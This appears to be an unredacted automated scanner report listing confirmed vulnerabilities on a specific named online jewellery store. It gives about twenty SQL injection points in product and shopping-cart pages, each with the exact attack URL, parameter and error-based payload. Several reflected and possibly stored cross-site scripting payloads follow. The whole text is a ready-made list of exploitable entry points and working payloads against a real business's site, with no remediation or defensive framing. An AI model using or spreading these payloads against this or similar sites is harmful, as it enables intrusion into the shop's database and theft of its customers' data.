zebaishjewellers.com

1. ||| SQL Injection
2.  
3. Severity : Critical
4. Confirmation : Confirmed
5. Vulnerable URL : http://zebaishjewellers.com/productdetail.php?id=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))&category=43
6. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
7. Parameter Name: id
8. Parameter Type: Querystring
9. Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
10.  
11. ||| [High Possibility] SQL Injection
12. Severity : Critical
13. Confirmation : Confirmed
14. Vulnerable URL : http://zebaishjewellers.com/productdetail.php?id=%27
15. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
16. Parameter Name: id
17. Parameter Type: Querystring
18. Attack Pattern: %27
19.  
20. Severity : Critical
21. Confirmation : Confirmed
22. Vulnerable URL : http://zebaishjewellers.com/productdetail.php?id=NSFTW
23. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
24. Parameter Name: id
25. Parameter Type: Querystring
26. Attack Pattern: NSFTW
27.  
28. Severity : Critical
29. Confirmation : Confirmed
30. Vulnerable URL : http://zebaishjewellers.com/newarival.php?page=%27
31. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
32. Parameter Name: page
33. Parameter Type: Querystring
34. Attack Pattern: %27
35.  
36. Severity : Critical
37. Confirmation : Confirmed
38. Vulnerable URL : http://zebaishjewellers.com/Featured.php?page=%27
39. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
40. Parameter Name: page
41. Parameter Type: Querystring
42. Attack Pattern: %27
43.  
44. Severity : Critical
45. Confirmation : Confirmed
46. Vulnerable URL : http://zebaishjewellers.com/products.php?page=%27
47. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
48. Parameter Name: page
49. Parameter Type: Querystring
50. Attack Pattern: %27
51.  
52. Severity : Critical
53. Confirmation : Confirmed
54. Vulnerable URL : http://zebaishjewellers.com/productdetail.php?id=%27&category=43
55. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
56. Parameter Name: id
57. Parameter Type: Querystring
58. Attack Pattern: %27
59.  
60. Severity : Critical
61. Confirmation : Confirmed
62. Vulnerable URL : http://zebaishjewellers.com/shoppingcart.php
63. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
64. Parameter Name: color
65. Parameter Type: Post
66. Attack Pattern: (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)
67.  
68. Severity : Critical
69. Confirmation : Confirmed
70. Vulnerable URL : http://zebaishjewellers.com/shoppingcart.php
71. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
72. Parameter Name: productid
73. Parameter Type: Post
74. Attack Pattern: %27
75.  
76. Severity : Critical
77. Confirmation : Confirmed
78. Vulnerable URL : http://zebaishjewellers.com/shoppingcart.php
79. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
80. Parameter Name: qty
81. Parameter Type: Post
82. Attack Pattern: %27
83.  
84. Severity : Critical
85. Confirmation : Confirmed
86. Vulnerable URL : http://zebaishjewellers.com/shoppingcart.php
87. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
88. Parameter Name: size
89. Parameter Type: Post
90. Attack Pattern: %27
91.  
92. Severity : Critical
93. Confirmation : Confirmed
94. Vulnerable URL : http://zebaishjewellers.com/shoppingcart.php?save=%27
95. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
96. Parameter Name: save
97. Parameter Type: Querystring
98. Attack Pattern: %27
99.  
100. Severity : Critical
101. Confirmation : Confirmed
102. Vulnerable URL : http://zebaishjewellers.com/shoppingcart.php?del=%27&id=2310
103. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
104. Parameter Name: del
105. Parameter Type: Querystring
106. Attack Pattern: %27
107.  
108. Severity : Critical
109. Confirmation : Confirmed
110. Vulnerable URL : http://zebaishjewellers.com/shoppingcart.php?cancel=%27
111. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
112. Parameter Name: cancel
113. Parameter Type: Querystring
114. Attack Pattern: %27
115.  
116. Severity : Critical
117. Confirmation : Confirmed
118. Vulnerable URL : http://zebaishjewellers.com/shoppingcart.php?save=convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))
119. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
120. Parameter Name: save
121. Parameter Type: Querystring
122. Attack Pattern: convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))
123.  
124. Severity : Critical
125. Confirmation : Confirmed
126. Vulnerable URL : http://zebaishjewellers.com/shoppingcart.php
127. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
128. Parameter Name: id
129. Parameter Type: Querystring
130. Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
131.  
132. Severity : Critical
133. Confirmation : Confirmed
134. Vulnerable URL : http://zebaishjewellers.com/shoppingcart.php
135. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
136. Parameter Name: id
137. Parameter Type: Post
138. Attack Pattern: %27
139.  
140. ||| XSS (Cross-site Scripting)
141.  
142. Severity : Important
143. Confirmation : Confirmed
144. Vulnerable URL : http://zebaishjewellers.com/productdetail.php?id='"--></style></script><script>alert(0x0000E2)</script>
145. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
146. Parameter Name: id
147. Parameter Type: Querystring
148. Attack Pattern: '"--></style></script><script>alert(0x0000E2)</script>
149.  
150. Severity : Important
151. Confirmation : Confirmed
152. Vulnerable URL : http://zebaishjewellers.com/productdetail.php?id='"--></style></script><script>alert(0x000150)</script>&category=43
153. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
154. Parameter Name: id
155. Parameter Type: Querystring
156. Attack Pattern: '"--></style></script><script>alert(0x000150)</script>
157.  
158. Severity : Important
159. Confirmation : Confirmed
160. Vulnerable URL : http://zebaishjewellers.com/shoppingcart.php
161. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
162. Parameter Name: qty
163. Parameter Type: Post
164. Attack Pattern: '" ns=alert(0x0002D5)
165.  
166. ||| [Possible] Permanent Cross-site Scripting
167.  
168. Severity : Important
169. Confirmation : Confirmed
170. Vulnerable URL : http://zebaishjewellers.com/shoppingcart.php
171. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
172. Injection URL: http://zebaishjewellers.com/shoppingcart.php
173. Parameter Name: qty
174. Parameter Type: Post
175. Attack Pattern: '+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'